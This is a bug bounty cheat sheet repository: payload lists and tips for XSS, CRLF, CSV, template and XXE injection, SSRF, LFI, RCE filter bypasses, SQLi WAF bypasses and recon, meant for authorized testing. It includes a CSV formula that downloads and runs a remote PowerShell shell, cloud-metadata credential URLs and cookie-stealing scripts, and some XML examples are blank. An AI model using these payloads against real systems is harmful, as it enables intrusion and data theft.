├── cheatsheets ├── content-injection.md ├── csv-injection.md ├── template-injection.md ├── xslt.md ├── practice-platforms.md ├── rce.md ├── bugbountyplatforms.md ├── cors.md ├── ssrf.md ├── recon.md ├── lfi.md ├── sqli.md ├── special-tools.md ├── bugbountytips.md ├── crlf.md ├── open-redirect.md ├── xxe.md ├── books.md ├── crypto.md └── xss.md ├── CONTRIBUTING.md ├── README.md └── LICENSE /cheatsheets/content-injection.md: -------------------------------------------------------------------------------- 1 | ## Content Injection 2 | 3 | ``` 4 | ❤ bounty pls 5 | ``` -------------------------------------------------------------------------------- /cheatsheets/csv-injection.md: -------------------------------------------------------------------------------- 1 | ## CSV Injection 2 | 3 | **Newline character** 4 | 5 | ``` 6 | %0A-3+3+cmd|' /C calc'!D2 7 | ``` 8 | 9 | **Meterpreter Shell** 10 | 11 | ``` 12 | =cmd|'/C powershell IEX(wget bit.ly/1X146m3)'!A0 13 | ``` -------------------------------------------------------------------------------- /cheatsheets/template-injection.md: -------------------------------------------------------------------------------- 1 | ## Template Injection 2 | 3 | **Ruby** 4 | 5 | ```ruby 6 | <%=`id`%> 7 | ``` 8 | 9 | **Twig** 10 | 11 | The following payload should output `49`. 12 | 13 | ``` 14 | {{7*'7'}} 15 | ``` 16 | 17 | **Jinja** 18 | 19 | This payload should output `7777777`. 20 | 21 | ``` 22 | {{7*'7'}} 23 | ``` 24 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # Contributing 2 | 3 | We welcome contributions from the public. 4 | 5 | ### Using the issue tracker 💡 6 | 7 | The issue tracker is the preferred channel for bug reports and features requests. [![GitHub issues](https://img.shields.io/github/issues/EdOverflow/bugbounty-cheatsheet.svg?style=flat-square)](https://github.com/EdOverflow/bugbounty-cheatsheet/issues) 8 | 9 | ### Issues and labels 🏷 10 | 11 | Our bug tracker utilizes several labels to help organize and identify issues. 12 | 13 | ### Guidelines for bug reports 🐛 14 | 15 | Use the GitHub issue search — check if the issue has already been reported. 16 | -------------------------------------------------------------------------------- /cheatsheets/xslt.md: -------------------------------------------------------------------------------- 1 | ## XSLT Injection 2 | 3 | **Backend infos** 4 | 5 | ```xml 6 | 7 | 8 | 9 | xsl:vendor =
10 | xsl:version =
11 | 12 | 13 | ``` 14 | 15 | **Injecting in PHP** 16 | 17 | ```xml 18 | 19 | 20 | 21 | 22 | 23 | 24 | ``` 25 | 26 | -------------------------------------------------------------------------------- /cheatsheets/practice-platforms.md: -------------------------------------------------------------------------------- 1 | ## Practice Platforms 2 | 3 | - [Pentesterlab](https://pentesterlab.com/) 4 | - [XSS Game](https://xss-game.appspot.com/) 5 | - [Hack This Site](https://www.hackthissite.org) 6 | - [Root-Me](https://www.root-me.org) 7 | - [HackTheBox](https://www.hackthebox.eu) 8 | - [Hack Me](https://hack.me) 9 | - [CTF 365](https://ctf365.com) 10 | - [Google Gruyere](https://google-gruyere.appspot.com/) 11 | - [OWASP Juice Shop](http://juice-shop.herokuapp.com/) 12 | - [Hack Yourself First](http://hackyourselffirst.troyhunt.com/) 13 | - [flAWS Cloud](http://flaws.cloud/) 14 | - [bWAPP](http://www.itsecgames.com/) 15 | - [OWASP Mutillidae] (https://www.owasp.org/index.php/OWASP_Mutillidae_2_Project) 16 | - [tryhackme](https://tryhackme.com/) 17 | - [Portswigger Labs](https://portswigger.net/web-security/all-labs) 18 | -------------------------------------------------------------------------------- /cheatsheets/rce.md: -------------------------------------------------------------------------------- 1 | ## RCE 2 | 3 | **Werkzeug Debugger** 4 | 5 | Find somewhere where user input can be supplied and submit the following string to cause an error: 6 | 7 | ``` 8 | strіng 9 | ``` 10 | 11 | If the target is running their application in debug mode you might be able to run commands. If you are running the target locally, you can probably brute-force the debugger PIN. The debugger PIN is always in the following format: `***-***-***`. 12 | 13 | **Basic Bypasses** 14 | 15 | ``` 16 | i'''d 17 | i"""d 18 | ``` 19 | 20 | ``` 21 | \l\s -l\a\h 22 | ``` 23 | 24 | ``` 25 | cat /e?c/p?ss?? 26 | cat /e??/??ss* 27 | ``` 28 | 29 | ``` 30 | {ls,} 31 | {ls,-a} 32 | ``` 33 | 34 | **Shellshock Bug** 35 | 36 | ```bash 37 | () { :;}; echo vulnerable 38 | ``` 39 | 40 | ```zsh 41 | curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/ 42 | ``` 43 | -------------------------------------------------------------------------------- /cheatsheets/bugbountyplatforms.md: -------------------------------------------------------------------------------- 1 | ## Bug Bounty Platforms 2 | 3 | **Open For Signup** 4 | 5 | - [HackerOne](https://www.hackerone.com/) 6 | - [Bugcrowd](https://www.bugcrowd.com/) 7 | - [BountyFactory](https://bountyfactory.io/) 8 | - [Intigriti](https://intigriti.be/) 9 | - [Bugbountyjp](https://bugbounty.jp/) 10 | - [Safehats](https://safehats.com/) 11 | - [BugbountyHQ](https://www.bugbountyhq.com/) 12 | - [Hackerhive](https://hackerhive.io/) 13 | - [Hackenproof](https://hackenproof.com/) 14 | - [Hacktrophy](https://hacktrophy.com/) 15 | - [CESPPA](https://www.cesppa.com/) 16 | 17 | **Invite based Platforms** 18 | 19 | - [Synack](https://www.synack.com/red-team/) 20 | - [Cobalt](https://cobalt.io/) 21 | - [Zerocopter](https://zerocopter.com/) 22 | - [Yogosha](https://www.yogosha.com/) 23 | - [Bugbountyzone](https://bugbountyzone.com/) 24 | - [Antihack.me](http://www.antihack.me/) 25 | - [Vulnscope](https://www.vulnscope.com/) 26 | -------------------------------------------------------------------------------- /cheatsheets/cors.md: -------------------------------------------------------------------------------- 1 | ## Cross Origin Resource Sharing (CORS) 2 | 3 | Testing: 4 | `curl --head -s 'http://example.com/api/v1/secret' -H 'Origin: http://evil.com'` 5 | 6 | Check to see what the server responds with in the `Access-Control-Allow-Origin:` (if anything) and if so, check if `Access-Control-Allow-Credentials: true` is present. 7 | 8 | If it is trusting arbitrary origins **with** allow-credentials set to true, then host this HTML as a proof of concept. 9 | 10 | ``` 11 | 12 | 13 | BugBounty CheatSheet 14 | 15 |
16 |

CORs POC

17 | 18 |
20 | 21 | 22 | 23 | 36 | ``` 37 | -------------------------------------------------------------------------------- /cheatsheets/ssrf.md: -------------------------------------------------------------------------------- 1 | ## SSRF 2 | 3 | ``` 4 | http://0177.1/ 5 | ``` 6 | 7 | ``` 8 | http://0x7f.1/ 9 | ``` 10 | 11 | ``` 12 | http://127.000.000.1 13 | ``` 14 | 15 | ``` 16 | https://520968996 17 | ``` 18 | 19 | _Note:_ The latter can be calculated using http://www.subnetmask.info/ 20 | 21 | **Exotic Handlers** 22 | 23 | ``` 24 | gopher://, dict://, php://, jar://, tftp:// 25 | ``` 26 | 27 | **IPv6** 28 | 29 | ``` 30 | http://[::1] 31 | ``` 32 | 33 | ``` 34 | http://[::] 35 | ``` 36 | 37 | **Wildcard DNS** 38 | 39 | ``` 40 | 10.0.0.1.xip.io 41 | www.10.0.0.1.xip.io 42 | mysite.10.0.0.1.xip.io 43 | foo.bar.10.0.0.1.xip.io 44 | ``` 45 | _Link:_ http://xip.io 46 | 47 | ``` 48 | 10.0.0.1.nip.io 49 | app.10.0.0.1.nip.io 50 | customer1.app.10.0.0.1.nip.io 51 | customer2.app.10.0.0.1.nip.io 52 | otherapp.10.0.0.1.nip.io 53 | ``` 54 | 55 | _Link:_ http://nip.io 56 | 57 | **AWS EC2 Metadata** 58 | 59 | ``` 60 | http://169.254.169.254/latest/meta-data/ 61 | ``` 62 | 63 | ``` 64 | http://169.254.169.254/latest/meta-data/local-hostname 65 | ``` 66 | 67 | ``` 68 | http://169.254.169.254/latest/meta-data/public-hostname 69 | ``` 70 | 71 | > If there is an IAM role associated with the instance, role-name is the name of the role, and role-name contains the temporary security credentials associated with the role [...] 72 | 73 | _Link:_ http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html (includes a comprehensive Instance Metadata Categories table) 74 | -------------------------------------------------------------------------------- /cheatsheets/recon.md: -------------------------------------------------------------------------------- 1 | # Certspotter 2 | 3 | ```zsh 4 | curl https://certspotter.com/api/v0/certs\?domain\=example.com | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | uniq 5 | ``` 6 | 7 | ```zsh 8 | curl https://certspotter.com/api/v0/certs\?domain\=example.com | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | uniq | dig +short -f - | uniq | nmap -T5 -Pn -sS -i - -p 80,443,21,22,8080,8081,8443 --open -n -oG - 9 | ``` 10 | 11 | # Sublist3r One-liner 12 | 13 | This runs [Sublist3r](https://github.com/aboul3la/Sublist3r) on a list of domains and outputs the results in separate files. 14 | 15 | ``` 16 | . <(cat domains | xargs -n1 -i{} python sublist3r.py -d {} -o {}.txt) 17 | ``` 18 | 19 | # [Apktool](https://ibotpeaches.github.io/Apktool/) to [LinkFinder](https://github.com/GerbenJavado/LinkFinder) 20 | 21 | ``` 22 | apktool d app.apk; cd app;mkdir collection; find . -name \*.smali -exec sh -c "cp {} collection/\$(head /dev/urandom | md5 | cut -d' ' -f1).smali" \;; linkfinder -i 'collection/*.smali' -o cli 23 | ``` 24 | 25 | # [Aquatone](https://github.com/michenriksen/aquatone/) One-liner 26 | 27 | ``` 28 | $ echo "aquatone-discover -d \$1 && aquatone-scan -d \$1 --ports huge && aquatone-takeover -d \$1 && aquatone-gather -d \$1" >> aqua.sh && chmod +x aqua.sh 29 | $./aqua.sh domain.com 30 | ``` 31 | 32 | # [relative-url-extractor](https://github.com/jobertabma/relative-url-extractor) 33 | 34 | ``` 35 | $ ruby extract.rb demo-file.js 36 | $ ruby extract.rb https://hackerone.com/some-file.js 37 | $ ruby extract.rb '|cat demo-file.js' -c 38 | ``` 39 | -------------------------------------------------------------------------------- /cheatsheets/lfi.md: -------------------------------------------------------------------------------- 1 | ## LFI 2 | 3 | **Filter Bypass** 4 | 5 | ``` 6 | ../\ 7 | ``` 8 | 9 | ``` 10 | ..\/ 11 | ``` 12 | 13 | ``` 14 | /.. 15 | ``` 16 | 17 | ``` 18 | \/.. 19 | ``` 20 | 21 | ``` 22 | /%5c.. 23 | ``` 24 | 25 | **FFmpeg Local File Disclosure** 26 | 27 | This [script](https://github.com/neex/ffmpeg-avi-m3u-xbin/blob/master/gen_xbin_avi.py) by @neex can be used to disclose local files on FFmpeg hosts which parse externally-referencing [HLS playlists](https://ffmpeg.org/ffmpeg-formats.html#hls-2). 28 | 29 | _Steps to reproduce_ 30 | 31 | 1. Please download the script from @neex to your "attacker" instance 32 | 2. Execute the script with your desired parameters: `python3 gen_xbin_avi.py file:///etc/hostname bugbounty.avi` 33 | 3. Upload the generated AVI file to your target site (e.g. within a 'video upload page') 34 | 4. The target may process the malicious HLS inclusion with FFmpeg on the server-side. 35 | 5. Play the uploaded AVI via the target site. If successful, your desired file will be disclosed within the video. 36 | 37 | Alternative scripts exist which may generate different HLS formats or lead to the desired file being disclosed in a different manner. 38 | 39 | **Blogs** 40 | * http://pastie.org/840199 41 | * http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ 42 | * http://www.notsosecure.com/folder2/2010/08/20/lfi-code-exec-remote-root/?utm_source=twitterfeed&utm_medium=twitter 43 | * http://labs.neohapsis.com/2008/07/21/local-file-inclusion-%E2%80%93-tricks-of-the-trade/ 44 | * http://www.digininja.org/blog/when_all_you_can_do_is_read.php 45 | -------------------------------------------------------------------------------- /cheatsheets/sqli.md: -------------------------------------------------------------------------------- 1 | ## SQLI 2 | 3 | **Akamai Kona Bypass** 4 | 5 | * `MID` instead of `SUBSTRING` 6 | * `LIKE` instead of `=` 7 | * `/**/` instead of a `space` 8 | * `CURRENT_USER` instead of `CURRENT_USER()` 9 | * ` "` instead of `'` 10 | 11 | Final example: 12 | 13 | ```sql 14 | 444/**/OR/**/MID(CURRENT_USER,1,1)/**/LIKE/**/"p"/**/# 15 | ``` 16 | 17 | **Blogs** 18 | 19 | * http://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/ 20 | * http://isc.sans.edu/diary.html?storyid=9397 21 | * http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ 22 | * http://xd-blog.com.ar/descargas/manuales/bugs/full-mssql-injection-pwnage.html 23 | * http://securityoverride.com/articles.php?article_id=1&article=The_Complete_Guide_to_SQL_Injections 24 | * http://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/ 25 | * http://sqlzoo.net/hack/ 26 | * http://www.sqlteam.com/article/sql-server-versions 27 | * http://www.krazl.com/blog/?p=3 28 | * http://www.owasp.org/index.php/Testing_for_MS_Access 29 | * http://web.archive.org/web/20101112061524/http://seclists.org/pen-test/2003/May/0074.html 30 | * http://web.archive.org/web/20080822123152/http://www.webapptest.org/ms-access-sql-injection-cheat-sheet-EN.html 31 | * http://www.youtube.com/watch?v=WkHkryIoLD0 32 | * http://layerone.info/archives/2009/Joe%20McCray%20-%20Advanced%20SQL%20Injection%20-%20L1%202009.pdf 33 | * http://vimeo.com/3418947 34 | * http://sla.ckers.org/forum/read.php?24,33903 35 | * http://websec.files.wordpress.com/2010/11/sqli2.pdf 36 | * http://old.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/ 37 | * http://ha.ckers.org/sqlinjection/ 38 | * http://lab.mediaservice.net/notes_more.php?id=MSSQL 39 | -------------------------------------------------------------------------------- /cheatsheets/special-tools.md: -------------------------------------------------------------------------------- 1 | ## Special Tools 2 | 3 | **Resolution** 4 | 5 | - http://dnsbin.zhack.ca (DNS) 6 | - http://pingb.in (DNS) 7 | - https://www.mockbin.org/ (HTTP) 8 | 9 | **Wildcard DNS** 10 | 11 | - http://xip.io 12 | 13 | ``` 14 | 10.0.0.1.xip.io 15 | www.10.0.0.1.xip.io 16 | mysite.10.0.0.1.xip.io 17 | foo.bar.10.0.0.1.xip.io 18 | ``` 19 | 20 | - http://nip.io 21 | 22 | ``` 23 | 10.0.0.1.nip.io 24 | app.10.0.0.1.nip.io 25 | customer1.app.10.0.0.1.nip.io 26 | customer2.app.10.0.0.1.nip.io 27 | otherapp.10.0.0.1.nip.io 28 | ``` 29 | 30 | **Reconnaissance** 31 | 32 | - https://spyse.com (fully-fledged recon service) 33 | - https://dnsdumpster.com (DNS and subdomain recon) 34 | - [Reverse IP Lookup](http://reverseip.domaintools.com/) (Domainmonitor) 35 | - [Security headers](https://securityheaders.io/) (Security Report, missing headers) 36 | - http://threatcrowd.org (WHOIS, DNS, email, and subdomain recon) 37 | - https://mxtoolbox.com (wide range of DNS-related recon tools) 38 | - https://publicwww.com/ (Source Code Search Engine) 39 | - http://ipv4info.com/ (Find domains in the IP block owned by a Company/Organization) 40 | - [HackerTarget Tools](https://hackertarget.com/ip-tools/) (DNS recon, site lookup, and scanning tools) 41 | - [VirusTotal](https://virustotal.com/en-gb/domain/google.com/information/) (WHOIS, DNS, and subdomain recon) 42 | - [crt.sh](https://crt.sh/?q=%25.uber.com) (SSL certificate search) 43 | - [Google CT](https://transparencyreport.google.com/https/certificates) (SSL certificate transparency search) 44 | - [PenTest Tools](https://pentest-tools.com/information-gathering/google-hacking) (Google dorks) 45 | - [Wayback Machine](https://archive.org/web/) (Find stuff which was hosted on the domain in past) 46 | - [FindSubdomains](https://findsubdomains.com/) (Find subdomains using domain or keywords) 47 | 48 | 49 | 50 | **Report Templates** 51 | 52 | - https://github.com/fransr/template-generator 53 | - https://github.com/ZephrFish/BugBountyTemplates 54 | -------------------------------------------------------------------------------- /cheatsheets/bugbountytips.md: -------------------------------------------------------------------------------- 1 | ## Bug Bounty Tips 2 | 3 | **Tip #1** 4 | 5 | Use GIT as a recon tool. Find the target's GIT repositories, clone them, and then check the logs for information on the team not necessarily in the source code. Say the target is Reddit and I want to see which developers work on certain projects. 6 | 7 | [Link](https://gist.github.com/EdOverflow/a9aad69a690d97a8da20cd4194ca6596 ) 8 | 9 | **Tip #2** 10 | 11 | Look for GitLab instances on targets or belonging to the target. When you stumble across the GitLab login panel, navigate to `/explore`. Misconfigured instances do not require authentication to view the internal projects. Once you get in, use the search function to find passwords, keys, etc. This is a pretty big attack vector and I am finally revealing it today, because I am sure it will help a lot of you get some critical issues. 12 | 13 | **Tip #3** 14 | 15 | 16 | Bug bounty tip: test applications of a company that costs money or requires manual setup. Chances are only few to none would have tested it leaving it vulnerable. 17 | 18 | **Tip #4** 19 | 20 | If you’ve found an IDOR where you’re able to change data of others then don’t jump out of your seat to report it > modify it to XSS payload & if inputs are not sanitized & variables are echo’d without getting escaped then IDOR>XSS>ATO. 21 | 22 | 23 | **Tip #5** 24 | 25 | Look for *hackathon-related* assets. What I mean by this is sometimes companies run hackathons and give attendees special access to certain API endpoints and/or temporary credentials. I have found GIT instances that were set up for Hackathons full of information that allowed me to find more issues in the target several times. 26 | 27 | 28 | 29 | **Tip #6** 30 | 31 | Keep all your directory brute force results so when a CVE like Drupalgeddon2 comes out, you can look for previously found instances (cat dirsearch/reports/*/* | grep INSTALL.mysql.txt | grep 200 | less)/ 32 | 33 | 34 | 35 | **Tip #7** 36 | 37 | When you have a form, always try to change the request method from POST to GET in order to improve the CVSS score. 38 | For example, demonstrating a CSRF can be exploited simply by using \[img\] tag is better than having to send a link to the victim. 39 | -------------------------------------------------------------------------------- /cheatsheets/crlf.md: -------------------------------------------------------------------------------- 1 | ## CRLF Injection || HTTP Response Splitting 2 | 3 | ``` 4 | %0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; 5 | ``` 6 | 7 | **Header-based test, site root** 8 | 9 | ``` 10 | %0d%0aheader:header 11 | ``` 12 | ``` 13 | %0aheader:header 14 | ``` 15 | ``` 16 | %0dheader:header 17 | ``` 18 | ``` 19 | %23%0dheader:header 20 | ``` 21 | ``` 22 | %3f%0dheader:header 23 | ``` 24 | 25 | ``` 26 | /%250aheader:header 27 | ``` 28 | 29 | ``` 30 | /%25250aheader:header 31 | ``` 32 | 33 | ``` 34 | /%%0a0aheader:header 35 | ``` 36 | 37 | ``` 38 | /%3f%0dheader:header 39 | ``` 40 | 41 | ``` 42 | /%23%0dheader:header 43 | ``` 44 | 45 | ``` 46 | /%25%30aheader:header 47 | ``` 48 | 49 | ``` 50 | /%25%30%61header:header 51 | ``` 52 | 53 | ``` 54 | /%u000aheader:header 55 | ``` 56 | 57 | **CRLF chained with Open Redirect server misconfiguration** 58 | 59 | _Note:_ This sometimes works. (Discovered in some Yandex sites, was not exploitable from the root.) 60 | 61 | ``` 62 | //www.google.com/%2f%2e%2e%0d%0aheader:header 63 | ``` 64 | ``` 65 | /www.google.com/%2e%2e%2f%0d%0aheader:header 66 | ``` 67 | ``` 68 | /google.com/%2F..%0d%0aheader:header 69 | ``` 70 | 71 | **Twitter specific CRLF** by [@filedescriptor](http://blog.innerht.ml/twitter-crlf-injection/) 72 | 73 | ``` 74 | %E5%98%8A%E5%98%8Dheader:header 75 | ``` 76 | 77 | **CRLF Injection to XSS** 78 | 79 | ``` 80 | %0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a%0d%0a0%0d%0a/%2e%2e 81 | ``` 82 | 83 | **Response splitting on 302 Redirect, before Location header** (Discovered in DoD) 84 | 85 | ``` 86 | %0d%0aContent-Type:%20text%2fhtml%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS');%3C%2fscript%3E 87 | ``` 88 | 89 | **Response splitting on 301 code, chained with Open Redirect to corrupt location header and to break 301** by [@black2fan](https://twitter.com/black2fan) (Facebook bug) 90 | 91 | _Note:_ `xxx:1` was used for breaking open redirect destination (Location header). Great example how of to escalate CRLF to XSS on a such, it would seem, unexploitable 301 status code. 92 | 93 | ``` 94 | %2Fxxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a%3cscript%3ealert(document.cookie)%3c/script%3e%2F..%2F..%2F..%2F../tr 95 | ``` 96 | -------------------------------------------------------------------------------- /cheatsheets/open-redirect.md: -------------------------------------------------------------------------------- 1 | ## Open Redirect 2 | 3 | ``` 4 | /%09/google.com 5 | ``` 6 | 7 | ``` 8 | /%5cgoogle.com 9 | ``` 10 | 11 | ``` 12 | //www.google.com/%2f%2e%2e 13 | ``` 14 | 15 | ``` 16 | //www.google.com/%2e%2e 17 | ``` 18 | 19 | ``` 20 | //google.com/ 21 | ``` 22 | 23 | ``` 24 | //google.com/%2f.. 25 | ``` 26 | 27 | ``` 28 | //\google.com 29 | ``` 30 | 31 | ``` 32 | /\victim.com:80%40google.com 33 | ``` 34 | 35 | ## Possible open redirect parameters 36 | 37 | ``` 38 | ?url=http://{target} 39 | ``` 40 | 41 | ``` 42 | ?url=https://{target} 43 | ``` 44 | 45 | ``` 46 | ?next=http://{target} 47 | ``` 48 | 49 | ``` 50 | ?next=https://{target} 51 | ``` 52 | 53 | ``` 54 | ?url=https://{target} 55 | ``` 56 | 57 | ``` 58 | ?url=http://{target} 59 | ``` 60 | 61 | ``` 62 | ?url=//{target} 63 | ``` 64 | 65 | ``` 66 | ?url=$2f%2f{target} 67 | ``` 68 | 69 | ``` 70 | ?next=//{target} 71 | ``` 72 | 73 | ``` 74 | ?next=$2f%2f{target} 75 | ``` 76 | 77 | ``` 78 | ?url=//{target} 79 | ``` 80 | 81 | ``` 82 | ?url=$2f%2f{target} 83 | ``` 84 | 85 | ``` 86 | ?url=//{target} 87 | ``` 88 | 89 | ``` 90 | /redirect/{target} 91 | ``` 92 | 93 | ``` 94 | /cgi-bin/redirect.cgi?{target} 95 | ``` 96 | 97 | ``` 98 | /out/{target} 99 | ``` 100 | 101 | ``` 102 | /out?{target} 103 | ``` 104 | 105 | ``` 106 | /out?/{target} 107 | ``` 108 | 109 | ``` 110 | /out?//{target} 111 | ``` 112 | 113 | ``` 114 | /out?/\{target} 115 | ``` 116 | 117 | ``` 118 | /out?///{target} 119 | ``` 120 | 121 | ``` 122 | ?view={target} 123 | ``` 124 | 125 | ``` 126 | ?view=/{target} 127 | ``` 128 | 129 | ``` 130 | ?view=//{target} 131 | ``` 132 | 133 | ``` 134 | ?view=/\{target} 135 | ``` 136 | 137 | ``` 138 | ?view=///{target} 139 | ``` 140 | 141 | ``` 142 | /login?to={target} 143 | ``` 144 | 145 | ``` 146 | /login?to=/{target} 147 | ``` 148 | 149 | ``` 150 | /login?to=//{target} 151 | ``` 152 | 153 | ``` 154 | /login?to=/\{target} 155 | ``` 156 | 157 | ``` 158 | /login?to=///{target} 159 | ``` 160 | 161 | 162 | 163 | **Open Redirect Payloads** by @cujanovic 164 | 165 | https://github.com/cujanovic/Open-Redirect-Payloads 166 | 167 | 168 | **Open Redirect Paramters** by @fuzzdb-project 169 | 170 | https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/redirect/redirect-urls-template.txt 171 | -------------------------------------------------------------------------------- /cheatsheets/xxe.md: -------------------------------------------------------------------------------- 1 | **LFI Test** 2 | 3 | ``` 4 | 5 | 7 | ]>&xxe; 8 | ``` 9 | 10 | **Blind LFI test (when first case doesn't return anything)** 11 | 12 | ``` 13 | 14 | 16 | 17 | ]>&blind; 18 | ``` 19 | 20 | **Access Control bypass (loading restricted resources - PHP example)** 21 | 22 | ``` 23 | 24 | ]> 26 | 27 | ``` 28 | 29 | **SSRF Test** 30 | 31 | ``` 32 | 33 | 35 | ]>&xxe; 36 | ``` 37 | 38 | **XEE (XML Entity Expansion - DOS)** 39 | 40 | ``` 41 | 42 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | ]> 55 | &lol9; 56 | ``` 57 | 58 | **XEE #2 (Remote attack - through external xml inclusion)** 59 | 60 | ``` 61 | 62 | ]> 64 | 3..2..1...&test 65 | ``` 66 | 67 | **XXE FTP HTTP Server** 68 | 69 | https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb 70 | 71 | http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html 72 | ``` 73 | 75 | %remote; 76 | %send; 77 | ]> 78 | 4 79 | 80 | File stored on http://publicServer.com/parameterEntity_sendftp.dtd 81 | 82 | "> 83 | %param1; 84 | ``` 85 | 86 | **XXE UTF-7** 87 | 88 | ``` 89 | 90 | +ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4 91 | +ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+ 92 | +ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4 93 | ``` 94 | To convert between UTF-8 & UTF-7 use recode. 95 | `recode UTF8..UTF7 payload-file.xml` 96 | -------------------------------------------------------------------------------- /cheatsheets/books.md: -------------------------------------------------------------------------------- 1 | ## Books 2 | **Web and browser** 3 | - [Web Hacking 101](https://leanpub.com/web-hacking-101) by Peter Yaworski. 4 | - [Breaking into Information Security: Learning the Ropes 101](https://leanpub.com/ltr101-breaking-into-infosec) by Andy Gill. 5 | - [The Web Application Hacker’s Handbook: Finding and Exploiting Security Flaws](https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470/) by Dafydd Stuttard and Marcus Pinto. 6 | - [Tangled Web](https://www.nostarch.com/tangledweb) by Michal Zalewski. 7 | - [OWASP Testing Guide v4](https://www.owasp.org/images/1/19/OTGv4.pdf) by OWASP Breakers community. 8 | 9 | **Mobile** 10 | - [The Mobile Application Hacker's Handbook](https://www.amazon.com/Mobile-Application-Hackers-Handbook/dp/1118958500) by Dominic Chell et al. 11 | - [iOS Application Security: The Definitive Guide for Hackers and Developers](https://www.nostarch.com/iossecurity) by David Thiel. 12 | 13 | **Cryptography** 14 | - [Crypto 101](https://www.crypto101.io/) by Laurens Van Houtven. 15 | 16 | **Penetration Testing** 17 | - [The Art of Exploitation by Jon Erickson, 2008](https://www.nostarch.com/hacking2.htm) 18 | - [Metasploit: The Penetration Tester's Guide by David Kennedy et al., 2011](https://www.nostarch.com/metasploit) 19 | - [Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman, 2014](https://www.nostarch.com/pentesting) 20 | - [Rtfm: Red Team Field Manual by Ben Clark, 2014](http://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504/) 21 | - [The Hacker Playbook by Peter Kim, 2014](http://www.amazon.com/The-Hacker-Playbook-Practical-Penetration/dp/1494932636/) 22 | - [The Basics of Hacking and Penetration Testing by Patrick Engebretson, 2013](https://www.elsevier.com/books/the-basics-of-hacking-and-penetration-testing/engebretson/978-1-59749-655-1) 23 | - [Professional Penetration Testing by Thomas Wilhelm, 2013](https://www.elsevier.com/books/professional-penetration-testing/wilhelm/978-1-59749-993-4) 24 | - [Advanced Penetration Testing for Highly-Secured Environments by Lee Allen, 2012](http://www.packtpub.com/networking-and-servers/advanced-penetration-testing-highly-secured-environments-ultimate-security-gu) 25 | - [Violent Python by TJ O'Connor, 2012](https://www.elsevier.com/books/violent-python/unknown/978-1-59749-957-6) 26 | - [Fuzzing: Brute Force Vulnerability Discovery by Michael Sutton et al., 2007](http://www.fuzzing.org/) 27 | - [Black Hat Python: Python Programming for Hackers and Pentesters by Justin Seitz, 2014](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900) 28 | - [Penetration Testing: Procedures & Methodologies by EC-Council, 2010](http://www.amazon.com/Penetration-Testing-Procedures-Methodologies-EC-Council/dp/1435483677) 29 | - [Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp, 2010](http://www.amazon.com/Unauthorised-Access-Physical-Penetration-Security-ebook/dp/B005DIAPKE) 30 | - [Advanced Persistent Threat Hacking: The Art and Science of Hacking Any Organization by Tyler Wrightson, 2014](http://www.amazon.com/Advanced-Persistent-Threat-Hacking-Organization/dp/0071828362) 31 | - [Bug Hunter's Diary by Tobias Klein, 2011](https://www.nostarch.com/bughunter) 32 | - [Advanced Penetration Testing by Wil Allsopp, 2017](https://www.amazon.com/Advanced-Penetration-Testing-Hacking-Networks/dp/1119367689/) 33 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Bug Bounty Cheat Sheet 2 | 3 | | 📚 Reference | 🔎 Vulnerabilities | 4 | |-------------------------------------------------------------|-----------------------------------------------------------| 5 | | [Bug Bounty Platforms](cheatsheets/bugbountyplatforms.md) | [XSS](cheatsheets/xss.md) | 6 | | [Books](cheatsheets/books.md) | [SQLi](cheatsheets/sqli.md) | 7 | | [Special Tools](cheatsheets/special-tools.md) | [SSRF](cheatsheets/ssrf.md) | 8 | | [Recon](cheatsheets/recon.md) | [CRLF Injection](cheatsheets/crlf.md) | 9 | | [Practice Platforms](cheatsheets/practice-platforms.md) | [CSV Injection](cheatsheets/csv-injection.md) | 10 | | [Bug Bounty Tips](cheatsheets/bugbountytips.md) | [LFI](cheatsheets/lfi.md) | 11 | | | [XXE](cheatsheets/xxe.md) | 12 | | | [RCE](cheatsheets/rce.md) | 13 | | | [Open Redirect](cheatsheets/open-redirect.md) | 14 | | | [Crypto](cheatsheets/crypto.md) | 15 | | | [Template Injection](cheatsheets/template-injection.md) | 16 | | | [Content Injection](cheatsheets/content-injection.md) | 17 | | | [XSLT Injection](cheatsheets/xslt.md) | 18 | 19 | # Contributing 20 | 21 | We welcome contributions from the public. 22 | 23 | ### Using the issue tracker 💡 24 | 25 | The issue tracker is the preferred channel for bug reports and features requests. [![GitHub issues](https://img.shields.io/github/issues/EdOverflow/bugbounty-cheatsheet.svg?style=flat-square)](https://github.com/EdOverflow/bugbounty-cheatsheet/issues) 26 | 27 | ### Issues and labels 🏷 28 | 29 | Our bug tracker utilizes several labels to help organize and identify issues. 30 | 31 | ### Guidelines for bug reports 🐛 32 | 33 | Use the GitHub issue search — check if the issue has 